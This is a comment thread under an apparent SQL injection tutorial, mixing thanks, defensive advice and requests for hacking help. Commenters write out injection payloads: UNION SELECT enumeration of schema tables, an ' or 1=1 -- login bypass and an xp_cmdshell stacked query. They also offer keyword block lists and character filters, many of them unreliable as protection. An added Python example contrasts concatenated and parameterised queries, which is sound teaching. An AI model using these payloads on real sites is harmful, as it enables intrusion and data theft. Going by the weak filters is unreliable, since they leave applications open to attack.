Kudos to the author/s. This is by far the most in-depth write-up I have read. Thanks for taking the time to put this out!!

Subject: HEllo there.......
Date: 8 Jul. 2006
From: Renu
Hello there,
I have gone through this article and it's really helpful. But I do have one question: if I'm using .NET and SQL Server technology, what kind of things do I have to test for from a security point of view? If possible please answer back... I'm working with web applications using ASP.NET.

Subject: good article
Date: 13 Jul. 2006
From: amoogye
It was a good article to read. Thank you.

Subject: I highly suggest you watch this video...
Date: 14 Jul. 2006
From: Ralph
I found this blog which has some SQL Injection info, along with a link to a video where a guy uses SQL injection to replace a logging DLL on a web server and captures credit card information.
Anyone who thinks this is no big deal needs to watch. Go to this URL and then look for the video link.
http://devauthority.com/blogs/jwooley/archive/2006/07/11/1672.aspx

Subject: nothing worked
Date: 17 Jul. 2006
From: V8
I've been using PHP/MySQL for some time now and I am used to filtering user input, but when I found this article I tried some of the injections on my server and none of them worked. Sorry.

Subject: stored procedure
Date: 24 Jul. 2006
From: Ivan
Stored procedures are not always safe, because they construct an SQL statement at runtime pretty much the same way as a program would. It is possible, however, that arguments are passed to a stored procedure at runtime and that the actual SQL statement doesn't contain the arguments. There are sites which explain how to do this in SQL Server.

| Subject:
|
jim |
Date: |
1 Aug. 2006 |
| From: |
jim.scuba.kennedygmail.com |
Very scary that people think the use of stored procs will protect them from SQL injection (or the use of a particular web or RDBMS technology).
Folks, USE BIND VARIABLES. Don't allow dynamic SQL. If you want to use stored procs that is fine, but your stored procs better NOT use dynamic SQL. This problem isn't solely a Windows/SQL Server problem; it can appear on any DB server and any OS with any language if you do it right. (wrong) Again, use bind variables. Also bind variables scale better. |
|
| Subject:
|
the .NET tech |
Date: |
4 Aug. 2006 |
| From: |
Aaron |
| The .NET tech protects from malicious code in any inputs. The better option for security is .NET development. |
|
| Subject:
|
Good reading |
Date: |
10 Aug. 2006 |
| From: |
Elijah Daniel |
This is very informative and a recommended reading.
Keep it up! |
|
| Subject:
|
very nice |
Date: |
16 Aug. 2006 |
| From: |
EtHeReAl |
really very nice article for newbies and experts
thx very much |
|
| Subject:
|
hello |
Date: |
16 Aug. 2006 |
| From: |
pls how can i find HTML source code of ulr |
| pls how can i find HTML source code of ulr |
|
| Subject:
|
my way |
Date: |
27 Aug. 2006 |
| From: |
felpharyahoo.com |
| Ya don't execute the code if it contains ; / \ ' " = - it is that simple. Why does anybody try to complicate it???? |
|
| Subject:
|
my way |
Date: |
7 Sep. 2006 |
| From: |
Libstar |
Not that simple felpharyahoo.com!! What if the user requirement is to enter a string including one of these characters? ; / \ ' " = - (e.g. surname O'Neill which includes an apostrophe)
You gonna tell your client they can't have what they need? They gonna tell ya, you're not getting paid!!! |
|
| Subject:
|
to the person above me |
Date: |
8 Sep. 2006 |
| From: |
LostDreamer |
Well, if you do not execute any sql query containing those digits, how would one make a forum ? or any place where people can post messages ?
when they use a word with a ' in it, the code would not execute the insert query .....
Also a good option against SQL Injection is Magic Quotes.... it replaces all the ' & " with ' & \" which would not end / alter the SQL query. |
|
| Subject:
|
Very useful article, but... |
Date: |
15 Sep. 2006 |
| From: |
iframe srcfileciframe |
| What about Cript() and Decript() functions? For numbers we have no problem. If they are strings we can Cript and Decript the data using an easy algorithm, or we can restrict the string value to only the characters 1234567890ABCDEFG. |
|
| Subject:
|
The grammar in this article is horrific! |
Date: |
21 Sep. 2006 |
| From: |
I dont have time for this... |
| Seriously, proofread your pages. |
|
| Subject:
|
languagelibrary problem |
Date: |
23 Sep. 2006 |
| From: |
gaba |
Frankly people, this is ridiculous. You folks should start getting on at your language designers to do things properly so this stuff is not a problem.
The only problem here is that data passed to SQL does not have 'special' characters quoted before it gets to the query.
You should be able to do this manually. However, you should be given library functions that automatically do this for you.
searchfor="myid";
query="select * from table where id=?";
executequery(query, searchfor);
If the execute query function automatically removes all SQL injection problems, this is a non-issue.
I consider it a fatal language flaw not to have such a library issued as the standard database implementation. |
|
| Subject:
|
Seriosuly Lacking |
Date: |
24 Sep. 2006 |
| From: |
Rust |
So it's easy to see that this article is good information for the fledgling cracker out there, but what about sysadmins? There's a hundred lines on how to f*ck the system, but only 3 useful lines on how to prevent it.
Obviously, any competent server admin will have hardened his system, but what about all the developers out there? If they filter out "single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc", what are they replaced with? A single-quote is easy to replace with two single-quotes (which are stored in the database as a single quote), but does that work for the rest? Nope.
Sorry folks, but this article is only useful to crackers and server admins. There is virtually no useful information for developers here. |
|
| Subject:
|
Regex |
Date: |
26 Sep. 2006 |
| From: |
Duhhhh |
| Just regex all the data being passed to the database to remove ' siiiiiiiiiiiiiiiimple |
|
| Subject:
|
great articel |
Date: |
3 Oct. 2006 |
| From: |
baba |
| thanjks |
|
| Subject:
|
thats just OK |
Date: |
6 Oct. 2006 |
| From: |
LongVN |
| How about SA privileges? How about NC and remote control? |
|
| Subject:
|
Thanks much |
Date: |
7 Oct. 2006 |
| From: |
aashish_plycos.com |
| its really wonderful article.thanks much |
|
| Subject:
|
Thanks |
Date: |
12 Oct. 2006 |
| From: |
ckbandarayahoo.com |
| Its really nice article. Really i got lot from that. Thanks |
|
| Subject:
|
Great Topic for the Beginners |
Date: |
17 Oct. 2006 |
| From: |
Salman Farsi |
| A unique article of its kind, which is helpful for beginners. |
|
| Subject:
|
SQL injection on MS SQL and ASP. |
Date: |
17 Oct. 2006 |
| From: |
Vaclav |
I put an article on the web about MS SQL & ASP, including a practice example how it worked.
http://www.slavicek.net/misc/SqlInjection/index_en.htm |
|
| Subject:
|
Super, thank you! |
Date: |
18 Oct. 2006 |
| From: |
eddie |
| very useful, it helped me a lot. Thank you. |
|
| Subject:
|
sql injection |
Date: |
19 Oct. 2006 |
| From: |
ChrisM |
why don't you just (vb6):
replace(user_param,"'","''") when concatenating to dynamic sql string?
(replace single quote with two single quotes)
strsql = "select * from table where user='admin' and password='" & replace(user_param,"'","''") & "'"
set rs = conn.execute(strsql)
|
|
| Subject:
|
oh my goodness |
Date: |
27 Oct. 2006 |
| From: |
milad hatam |
| i don't wanna be hacked(useful) |
|
| Subject:
|
The requested URL miscSQLinsertion.htm was not found on this server. |
Date: |
27 Oct. 2006 |
| From: |
NoNameNoNickNoemai.com |
Is http://www.sensepost.com/misc/SQLinsertion.htm still valid?
It's a link from 9.0 section. |
|
| Subject:
|
http:www.sensepost.commiscSQLinsertion.htm |
Date: |
27 Oct. 2006 |
| From: |
Could you post it, please |
| http://www.sensepost.com/misc/SQLinsertion.htm does not work! |
|
| Subject:
|
translate |
Date: |
9 Nov. 2006 |
| From: |
armon_ahotmail.com |
| could anyone translate this to bosnian or croatian |
|
| Subject:
|
Very Useful |
Date: |
17 Nov. 2006 |
| From: |
Jon |
| Thanks for this. |
|
| Subject:
|
good article |
Date: |
18 Nov. 2006 |
| From: |
dhinos |
| good article |
|
| Subject:
|
Excellent!!!! |
Date: |
22 Nov. 2006 |
| From: |
Rurouni , rakhslackware-es.com |
Excellent little tutorial..!!! thanks,
just in case, if you get an error in section while using:
NOT IN ('login_id')-- , etc. .. you could try
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME <> 'login_id'--
It worked perfectly for me (<> means 'different' ),
|
|
| Subject:
|
good but complicated... |
Date: |
29 Nov. 2006 |
| From: |
asharma1991yahoo.com |
this is quite good for a mature person to understand........
well i am only 14 and i am interested in learning this
if any ones ready 2 help ..please mail me
|
|
| Subject:
|
Excellent Games with Google |
Date: |
30 Nov. 2006 |
| From: |
Google Games |
| http://www.googlegames.tk |
|
| Subject:
|
Very good |
Date: |
1 Dec. 2006 |
| From: |
cesar49hotmail.com |
| the information is very good. However, i would like to see some example how to avoid sql injection |
|
| Subject:
|
Very Good! |
Date: |
4 Dec. 2006 |
| From: |
me |
Very good!
People ought to use the mysql_real_escape_string() function. |
|
| Subject:
|
addslashes |
Date: |
23 Dec. 2006 |
| From: |
me |
| it is getting late and I did not read the whole article but a good way to allow quite a few special characters is to add slashes before. Using php it goes $new=(addslashes($old));. This works well with mysql but I don't know about the rest. |
|
| Subject:
|
Good one.......Explained clearly. but a bit lenghthy....... |
Date: |
27 Dec. 2006 |
| From: |
Vijaykumar Reddy vijay82.kumargmail.com |
| Good One..... who can read those need full detailed info..
|
|
| Subject:
|
excellent but stored proc is hackable |
Date: |
2 Jan. 2007 |
| From: |
gary |
Try this on your Northwind database:
SP:
CREATE PROCEDURE test (@mycity nvarchar(15))
AS
SELECT EmployeeID, LastName, FirstName, HomePhone, City
FROM Employees
WHERE City = @mycity
Now in query manager type in:
exec test 'x'; exec master.dbo.xp_cmdshell 'dir *.exe';--'
and this will work. |
|
| Subject:
|
thanks |
Date: |
8 Jan. 2007 |
| From: |
me |
| very helpful information u provided.......thank u... |
|
| Subject:
|
ty |
Date: |
10 Jan. 2007 |
| From: |
digit |
| very useful information, I recommend to read it. ;) |
|
| Subject:
|
Sql Injection |
Date: |
16 Jan. 2007 |
| From: |
imsamyrgmail.com |
| Nice, information keep it up. |
|
| Subject:
|
cool topic |
Date: |
23 Jan. 2007 |
| From: |
Eby |
| GUd article |
|
| Subject:
|
the codes r not helping |
Date: |
1 Feb. 2007 |
| From: |
aj_ridiculusyahoo.com |
| the codes given here are not workable in any sites plz give us some more codes |
|
| Subject:
|
easiest way to prevent it |
Date: |
7 Feb. 2007 |
| From: |
Ole |
There is a simple solution to all this, dunno if anybody mentioned it already since I didn't read it all. Replace the variable you send into the SQL query like this: replace(variableName,"'","'") and you're home free. The ' is now text based and won't interrupt the SQL query.
Oh .. and to all the ppl here trying to use this shit to hack .. don't, the only thing you do is ruin other ppls data. update a table and append the -- and you update every single row in that table since there is no reference to which row your updating anymore.
Don't bloody well try to hack! its not l33t or cool or anything. Anybody can follow a recipe. |
|
| Subject:
|
Response to purpoted exploit |
Date: |
9 Feb. 2007 |
| From: |
thatoneguy |
Now in query manager type in:
exec test 'x'; exec master.dbo.xp_cmdshell 'dir *.exe';--'
and this will work.
================
That works because the ";" key in Query Analyzer effectively sends two separate commands. To demonstrate the effect of attempting to attack that stored procedure via a SQL injection vector, it would look like this:
exec test 'x; exec master.dbo.xp_cmdshell 'dir *.exe'
Your initial syntax in QA is functionally identical to:
exec test 'x'
GO
exec master.dbo.xp_cmdshell 'dir *.exe'
GO
|
|
| Subject:
|
easiest way to prevent it |
Date: |
12 Feb. 2007 |
| From: |
Ole |
| oh fuck, the replace text was messed up by this form submission .. what i meant to write was replace the ' with the ascii equivalent of the sign... |
|
| Subject:
|
Good information for software testers also |
Date: |
13 Feb. 2007 |
| From: |
JCHT |
| The information in the article and in the comments is also useful for those of us charged with testing software so that we catch these things before the users do. |
|
| Subject:
|
prepared statements |
Date: |
17 Feb. 2007 |
| From: |
someguy |
| The easiest way around sql injection is using a prepared statement if your language supports it. it will just interpret whatever you put into it literally. |
|
| Subject:
|
Good article |
Date: |
3 Mar. 2007 |
| From: |
Solai |
| This article is very useful for understanding the SQL injection concept. One more suggestion: if you put up a document or PDF, it would be very useful to download the file and use it whenever we want.. |
|
| Subject:
|
i need help |
Date: |
10 Mar. 2007 |
| From: |
decoder |
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause.
/villaDisplay.asp, line 106
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error converting data type varchar to int.
/about/press_Details.asp, line 13
can somebody tell me why all this cos i use this
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
|
|
| Subject:
|
Yeap, not bad |
Date: |
12 Mar. 2007 |
| From: |
DarkDawn |
Hi developers,
Have a suggestion for you guys also. At the same time you are keeping an eye on the data passed to your Queries/SPs , change your error messages also in your app/server. Try to post the main message to a defined mail address for later checks and show something simple by error time. It is possible thru .net and is working for us, not sure about the other languages but must be a way.
By the way, it is always PERFECT to know what are the possible ways getting into your app AND DO NOT FORGET: crackers are mostly really smart; hire one for your security if it is really necessary. ;)
GL & Tanx |
|
| Subject:
|
Interesting.. |
Date: |
30 Mar. 2007 |
| From: |
Chia |
btw, If you RUN IIS 6.0, just disable access to the root directory using "..\" and also disable "Detailed Error Message" and replace it with "Sorry, an error has occurred". This way, there is no way for the attempting hacker to get any info back. Also in your ASP code or ASP.NET either use stored procedures, or make additional check statements to look at your Request.QueryString("") or Request.Form("")... like.. do an instr(stringname,";") test and see if ";" is found, if so throw an exception. Because if you enter data into a vulnerable form this will happen:
Let's say you input "test' ; <any SQL Command>;" into the form, then for the following SQL Query
SQLString = "Select * From Table1 where Username='" & userName & "'"...
It would look like :
Select * From Table1 where Username='test'; <any SQL Command>;
Which would then execute whatever comes after.
And you should test for other similar things, such as commands to Delete records and so forth. :) |
|
| Subject:
|
hi... can you check whats this kind of error can this be exploited |
Date: |
2 May 2007 |
| From: |
markykoy |
Server Error in '/WDSearch' Application.
--------------------------------------------------------------------------------
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>
--
need some comments |
|
| Subject:
|
Morons |
Date: |
10 May 2007 |
| From: |
Basiclife |
My official position is that half the people here are morons... SQL injection is a valid method of attack to ANY database with a web app (unless the developer had been careful). Stored procedures are NOT safe - If you call sp_Login 'username', 'password' and someone replaces 'username' with ','';<QUERY>-- then it will still execute query. Also, to the people above who are only here because they are too incompetent to understand the principles of SQL Injection - Go home and try again.
In regards to PHP: php has a mysql_escape_string function which is very handy for preventing injection but whether or not the developer uses it is another question.
And in answer to the post above, that's an ASP.NET error page which is specifically designed to not show ANY error information for HTTP 500 errors, thus making your life REALLY hard.
The yellow boxes on the error with the web configs are explaining how the site owner can allow error messages to be shown (no one does). This one might be a real pain. Good luck :) |
|
| Subject:
|
SQL injections in URLs |
Date: |
12 May 2007 |
| From: |
Mikki |
Good article.
Now address SQL injection attacks via the URL itself, wherein one appends SQL commands behind any numeric field in a URL. For instance, you could use ;select * from users.
|
|
| Subject:
|
Preventing SQL Injection |
Date: |
17 May 2007 |
| From: |
Vasu |
That is a good thing to do. Custom Errors mode = RemoteOnly prevents the error being shown to End User. That is definitely a good practice.
1) May be some times genuine errors that u may face when u r using from a client PC. Same u may not be able to simulate from Server or next time u do it. So it is always a good practice to use this
Try
Catch e as exception 'This can be put for every exception type
'Write to Original error Eventlog
'Put a Generic Message to the screen
'like 'There is Generic Error in the Operations, Contact ........ for getting your problem resolved'
End try
This is useful in .NET. You can put you equivalent code as per ur code language and Ensure all ur SQL Statement are covered with Error Handling. And No Error should be passed on to the screen from database.
2) Avoid using login 'sa' to access the data. Create a login on your own. Restrict its access only to your database avoiding master db access. |
|
| Subject:
|
Answers for this |
Date: |
24 May 2007 |
| From: |
tecnico_de_redeshotmail.com |
login page
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in D:\Inetpub\default\login.php on line 23
You haven't gotten away with it yet!!!! |
|
| Subject:
|
Comment |
Date: |
30 May 2007 |
| From: |
Amit |
Well ..While coding keep a guy who writes functions for input validation.
Validation is MUST ~!! |
|
| Subject:
|
how to attck if preparedstatment is used |
Date: |
7 Jun. 2007 |
| From: |
asmitadtechmahindra.com |
| Hi, I tried attacking a few sites in the way.....but they are all using 1) post request and probably using a preparedstatement object......in such a case how can we do SQL injection ....anyone please enlighten me.. |
|
| Subject:
|
How to prevent SQL injection |
Date: |
10 Jun. 2007 |
| From: |
Muhammad Irfan |
Hi!
I tried but :( Not how to prevent SQL injection Can anyone Tell me:( |
|
| Subject:
|
thnx |
Date: |
27 Jun. 2007 |
| From: |
alper celik |
thanks a lot for this brilliant article, and I suggest using stored procedures to protect us against SQL injections, and also do not give users full access to DB management.
Good luck |
|
| Subject:
|
A very simple solution for this! |
Date: |
29 Jun. 2007 |
| From: |
Freaky |
place this in your config file:
$_SERVER['REQUEST_URI'] = mysql_real_escape_string($_SERVER['REQUEST_URI']);
if you don't like this way use this:
$sql_url = $_SERVER['REQUEST_URI'];
$sql_array = Array();
$sql_array[] = "mysql";
$sql_array[] = ")";
$sql_array[] = ";";
$sql_array[] = "'";
$sql_array[] = "}";
$sql_array[] = "INSERT";
$sql_array[] = "DROPTABLE";
$sql_array[] = "TRUNCATE";
$sql_array[] = "DROP";
$sql_array[] = "UPDATE";
$sql_array[] = "%";
$sql_array[] = "UNION";
$sql_array[] = "ALL";
// $sql_array[] = ""; add things yourself
foreach($sql_array As $not_alowed) {
if(eregi($not_alowed,$sql_url)) {
echo 'SQL injection security!';
exit;
}
}
this will block all things named in the arrays!
All you have to do is put this in your config file that will be included into every page and all your problems are solved! |
|
| Subject:
|
Stored procedures do not prevent injection |
Date: |
5 Jul. 2007 |
| From: |
Burhaan |
| Using stored procedures does not necessarily prevent SQL injection. One has to be careful and ensure that strongly named types are defined in code. I learnt this the hard way! |
|
| Subject:
|
Help me sql injection |
Date: |
8 Jul. 2007 |
| From: |
shafiq |
i found an sql injection in a url! how can i access! its hard for me to hack am tired...
here is the info!
www.mywebsite.com/daily/kashmirnews/index.php?page='
how do i access?
|
|
| Subject:
|
Not Applicable anymore |
Date: |
18 Jul. 2007 |
| From: |
donpogi2yahoo.com |
| it is still useless even though you get to pass the login page. all session variables will be left empty and therefore, its like window shopping with no money. |
|
| Subject:
|
More advance SQL injection techniques |
Date: |
31 Jul. 2007 |
| From: |
Mr. India |
The techniques given above are very common and most people having a knowledge of SQL queries can easily understand and use such types of techniques.
Also the current web based projects are already able to cope with such kinds of injection; we need to find even more advanced methods to get the information from the secured database. |
|
| Subject:
|
My Way |
Date: |
14 Aug. 2007 |
| From: |
MohamadSoftengYahoo.com |
For avoiding all of this type of SQL (injecting) you can fetch all rows from the database and then compare the input with each record in the database like this:
$con=mysql_query("SELECT * FROM login WHERE ID<>'Login';");
while($get=mysql_fetch_row($con))
{
if($get[0]==$_REQUEST["ID"] && $get[1]==$_REQUEST["Password"])
{
print("Login accepted ...");
}
} |
|
| Subject:
|
SQL Injection |
Date: |
15 Aug. 2007 |
| From: |
Geso |
The methods contributed above by various people seem to be surpassed by time. SQL Injection seems to be able to pass most database that also have web applications.
Just ask the guyz over at the UN, the secretary generals message page was hacked and changed using purely SQL Injection. |
|
| Subject:
|
lol |
Date: |
21 Aug. 2007 |
| From: |
VaRz |
try
$re=array("*", ",", "|", "`", "'", '"', "%");
if ($_POST['textbox']){
$_POST['textbox'] = str_replace($re,"",$_POST['textbox']);
}
see if this works |
|
| Subject:
|
WHOILA |
Date: |
2 Oct. 2007 |
| From: |
Harddrive |
Hey, after reading this article I was so shocked to know how the internet world is so much exposed...!
SQL injections don't work for stored procedures...yeah..have tried to break the barriers as part of testing my own built project..
Thanks anyways, it was a good tutorial !! |
|
| Subject:
|
Of course SP are suscpetible! |
Date: |
2 Nov. 2007 |
| From: |
Basiclife |
For a start, it depends HOW you call the SP - I worked at a company that did something like (ASP):
Set ObjRS = ObjCon.Execute("e;EXEC ap_login '"e; & ... Blah
The problem is, it just moves the SQL injection issue from the DB to the web server. SPs are _more_ secure if parameterised correctly.
Additionally, Dynamic SQL in the SP will completely invalidate any such precautions unless you manually type-check, etc... as an SP does.
good article though - very handy for easily explaining to others (saves me repeating myself ad infinitum)
Thanks |
|
| Subject:
|
Help me in SQL Ijection |
Date: |
22 Nov. 2007 |
| From: |
DaSatti danish_satti2002atyahoo.com |
I have a simple query and i am trying SQL Injection but do not succeed. Here is the query
$query="select * from users where `user_name` = '".$user."' and `password` = '".$pass."'";
$res=mysql_query($query) or die("Error executing query".mysql_error());
if(mysql_num_rows($res)>0)
{//other code
}
else
{echo "invalid username or password"; }
Now I am inserting the following in the username field
' or 1=1 --
Still I am getting "Invalid username or password". What mistake am I making? I will be thankful if someone replies at my above provided email
Thanks |
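The concatenation-versus-binding argument running through these comments (ChrisM's quote doubling, jim's bind variables, someguy's prepared statements, Mikki's numeric URL field and the query just above), as an added example that is not code from the article or from any commenter: one constructed SQLite users table queried three ways, plus the numeric-field case where quote doubling cannot help. The table contents, function names and SQLite standing in for MySQL / SQL Server are assumptions.

```python
"""Added example: three login-query styles against an in-memory SQLite DB.

Assumptions (not from the page): a constructed `users` table with two rows,
and SQLite's dialect (`--` comments, doubled quotes as escapes) standing in
for the MySQL / SQL Server dialects discussed in the comments.
"""
import sqlite3


def make_db():
    """Constructed sample data: one admin account and a surname with an apostrophe."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, user_name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (user_name, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("O'Neill", "pw2")],
    )
    conn.commit()
    return conn


def login_concat(conn, user, pw):
    """Vulnerable: plain string concatenation, as in the PHP/ASP snippets above."""
    sql = (
        "SELECT COUNT(*) FROM users WHERE user_name = '" + user
        + "' AND password = '" + pw + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_quote_doubled(conn, user, pw):
    """ChrisM's fix: double every single quote before concatenating.
    Correct inside a quoted string literal, and only in that context."""
    user_q = user.replace("'", "''")
    pw_q = pw.replace("'", "''")
    sql = (
        "SELECT COUNT(*) FROM users WHERE user_name = '" + user_q
        + "' AND password = '" + pw_q + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_param(conn, user, pw):
    """Bind variables / prepared statement: the value never becomes SQL text,
    so an apostrophe in a surname needs no special handling either."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE user_name = ? AND password = ?",
        (user, pw),
    ).fetchone()
    return row[0] > 0


def names_by_id_concat(conn, id_text):
    """Numeric field built by concatenation (the URL case). Quote doubling is
    applied and still does nothing, because no quotes surround the value."""
    sql = (
        "SELECT user_name FROM users WHERE id = "
        + id_text.replace("'", "''")
        + " ORDER BY id"
    )
    return [r[0] for r in conn.execute(sql).fetchall()]


def names_by_id_param(conn, id_text):
    """Validate the type first, then bind: non-numeric input is rejected
    before any SQL is built."""
    id_int = int(id_text)  # raises ValueError for input such as "1 OR 1=1"
    rows = conn.execute(
        "SELECT user_name FROM users WHERE id = ? ORDER BY id", (id_int,)
    ).fetchall()
    return [r[0] for r in rows]


def demo():
    """Run every variant once and return the outcomes as a dict."""
    conn = make_db()
    bypass = "' or 1=1 --"  # the username payload quoted in the comments
    results = {
        "concat_bypassed": login_concat(conn, bypass, "x"),
        "doubled_bypassed": login_quote_doubled(conn, bypass, "x"),
        "param_bypassed": login_param(conn, bypass, "x"),
        "doubled_oneill_ok": login_quote_doubled(conn, "O'Neill", "pw2"),
        "param_oneill_ok": login_param(conn, "O'Neill", "pw2"),
        "numeric_concat_rows": names_by_id_concat(conn, "1 OR 1=1"),
    }
    try:
        names_by_id_param(conn, "1 OR 1=1")
        results["numeric_param_rejected"] = False
    except ValueError:
        results["numeric_param_rejected"] = True
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The concatenated login accepts the payload, the quote-doubled one rejects it while still accepting O'Neill, and the numeric case shows why escaping alone is not a general fix.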
|
| Subject:
|
help |
Date: |
5 Dec. 2007 |
| From: |
hax |
i am haviong trouble getting past the login with the strings. i type in admin for user name and i type in hi' or 1=1 for password. how do u pass it?
thanx |
|
| Subject:
|
What to do when magicquotegpc is on |
Date: |
12 Dec. 2007 |
| From: |
DaSatti Rawalpindi |
| Basic SQL Injection doesn't work when the magic_quote_gpc variable is on. By default it is on in PHP. However there are chances that it will not be on in later versions. The purpose of this is that it just embeds "\" behind characters such as " ' ", " " ", " \ " and some of the others. Can anybody tell what to do in this case |
|
| Subject:
|
Great artical! |
Date: |
31 Dec. 2007 |
| From: |
BkJk |
Hey. Very nice article.
I would just like to point out that when you said that SYSTEM has the same privileges as the administrator that that is slightly off. SYSTEM actually has more privileges because SYSTEM can terminate any process owned by SYSTEM whereas even an administrator can't do this. Nothing big, just wanted to point that out. |
|
| Subject:
|
very good explanation |
Date: |
9 Jan. 2008 |
| From: |
sukumar |
very good information u have given.
recently i was shifted to security testing department, but i dont know how to do security testing . but my team lead said that u have to hack or crack this application atleast once before this will go to customer said.
what can i do, which is the best way to learn the hack?
pls save me guide me..
|
|
| Subject:
|
How to prevent SQL injection. |
Date: |
10 Feb. 2008 |
| From: |
Mike |
I have a very effective way of stopping SQL injection --- if you're using PHP 5.2.3 use this little function:
function filter(&$item) {
if (is_array($item)) foreach ($item as &$element) filter($element);
else $item = str_replace(str_split("=+()*\\/"), NULL, htmlentities($item, ENT_QUOTES, "ISO-8859-1", TRUE));
}
Then simply call it on $_REQUEST:
filter($_REQUEST);
Job done :) |
|
| Subject:
|
sql injection tools to download |
Date: |
12 Feb. 2008 |
| From: |
sqlinject |
how to guard against the sql injection:
http://beta.firsttub.com/htdocs/cms/wordpress/2008/02/12/guard-against-the-sql-injection/ |
|
| Subject:
|
Is this safe part 1 of 2 |
Date: |
16 Feb. 2008 |
| From: |
blaghssd |
foreach($arrayname as $key => $value)
{
$value = str_replace("$", "_DOLLAR_", "$value");
$value = str_replace("=", "_E_", "$value");
$value = str_replace("&", "_AND_", "$value");
$value = str_replace("*", "_STAR_", "$value");
$value = str_replace("?", "_QUESTION_", "$value");
$value = str_replace("|", "_PIPE_", "$value");
$value = str_replace("`", "_TICK_", "$value");
$value = str_replace("#", "_POUND_", "$value");
$value = str_replace("^", "_CARROT_", "$value");
$value = str_replace("!", "_EXCLAMATION_", "$value");
$value = str_replace(";", "_SEMICOLON_", "$value");
$value = str_replace("~", "_WAVE_", "$value");
$value = str_replace(".", "_PERIOD_", "$value");
$value = str_replace("\"", "_QUOTE_", "$value");
$value = str_replace("'", "_APOSTROPHE_", "$value");
$value = str_replace("\\", "_BACKSLASH_", "$value");
$value = str_replace("@", "_AT_", "$value");
$value = str_replace("<", "_LEFT_ARROW_", "$value");
$value = str_replace(">", "_RIGHT_ARROW_", "$value");
$value = str_replace("[", "_LEFT_BRACKET_", "$value");
$value = str_replace("]", "_RIGHT_BRACKET_", "$value");
$value = str_replace("%", "_PERCENT_", "$value");
$returnarray[$key] = $value;
} |
|
| Subject:
|
Is this safe part 2 of 2 |
Date: |
16 Feb. 2008 |
| From: |
blaghssd |
$value = str_replace("_DOLLAR_", "$", "$value");
$value = str_replace("_E_", "=", "$value");
$value = str_replace("_AND_", "&", "$value");
$value = str_replace("_STAR_", "*", "$value");
$value = str_replace("_QUESTION_", "?", "$value");
$value = str_replace("_PIPE_", "|", "$value");
$value = str_replace("_TICK_", "`", "$value");
$value = str_replace("_POUND_", "#", "$value");
$value = str_replace("_CARROT_", "^", "$value");
$value = str_replace("_EXCLAMATION_", "!", "$value");
$value = str_replace("_SEMICOLON_", ";", "$value");
$value = str_replace("_WAVE_", "~", "$value");
$value = str_replace("_PERIOD_", ".", "$value");
$value = str_replace("_QUOTE_", "\"", "$value");
$value = str_replace("_APOSTROPHE_", "'", "$value");
$value = str_replace("_BACKSLASH_", "\\", "$value");
$value = str_replace("_AT_", "@", "$value");
$value = str_replace("_LEFT_ARROW_", "<", "$value");
$value = str_replace("_RIGHT_ARROW_", ">", "$value");
$value = str_replace("_LEFT_BRACKET_", "[", "$value");
$value = str_replace("_RIGHT_BRACKET_", "]", "$value");
$value = str_replace("_PERCENT_", "%", "$value"); |
|
| Subject:
|
tyvm |
Date: |
18 Feb. 2008 |
| From: |
ninja |
as a hacker/developer this was very useful, thank you for the information
XD |
|
| Subject:
|
IIS Filter |
Date: |
22 Mar. 2008 |
| From: |
josie |
Hi All,
I work as a System Engineer in a major ISP company and we are hosting a large number of legacy ASP applications which contain SQL Injection flaws. I always suggest clients solve the problem by hardening the source code, but 9 out of 10 times they don't have the resources. I have been using this tool when clients agree:
http://www.codeplex.com/IIS6SQLInjection
So far it seems to be working and I have not had problems except that I cannot install in Windows 64 bit. Have you heard about this tool? Is there a way to make it work in 64 bit? The source code is there but I am not good in C++.
Thanks,
P.S.: I am not using my real name to avoid problem with my clients. |
|
| Subject:
|
IIS Filter to SQL Injection |
Date: |
8 May 2008 |
| From: |
Better Safe than Sorry |
A few of our legacy ASP application were affected by this outbreak. It was an accident waiting to happen though. The blame is on the poorly written code, not in SQL or IIS. Since it is too expensive (and difficult) to fix all code, you have to live with it. I found an interesting and free (GNU with source code) application for IIS that proved very efficient. I am still being attacked, but the filter has blocked the effects of such attacks.
Installation and code can be found here:
http://www.codeplex.com/IIS6SQLInjection (binary only)
The only bad thing is that it is not compatible with Windows 64 bits. I had to move all ASP application to a lesser server :(
|
|
| Subject:
|
THANK YOU FOR TUTORIAL (SQL INJECTION) |
Date: |
13 May 2008 |
| From: |
Roland Stenmark |
Dear Sir,
Thank you for generously providing information about "SQL INJECTION ATTACK".
It is so nice of you to share important information regarding web security.
My Name is Roland Stenmark and I am a PHP Programmer in San Francisco.
I have been writing PHP, ASP, Java script, MYSQL codes for 5 years.
Now me and my clients began to concern/worry about how safe internet security is.
There are hackers everywhere and we all web professional are looking for a way to
secure safety of our web databases.
I have been searching/googling to find protection against SQL injection attacks.
There are hundreds of web articles out there. Your technical information is very useful.
Your tutorial help us a lot and we gained some knowledge.
Is there any more alternative ?
Using PHP PDO Object is also a good idea?
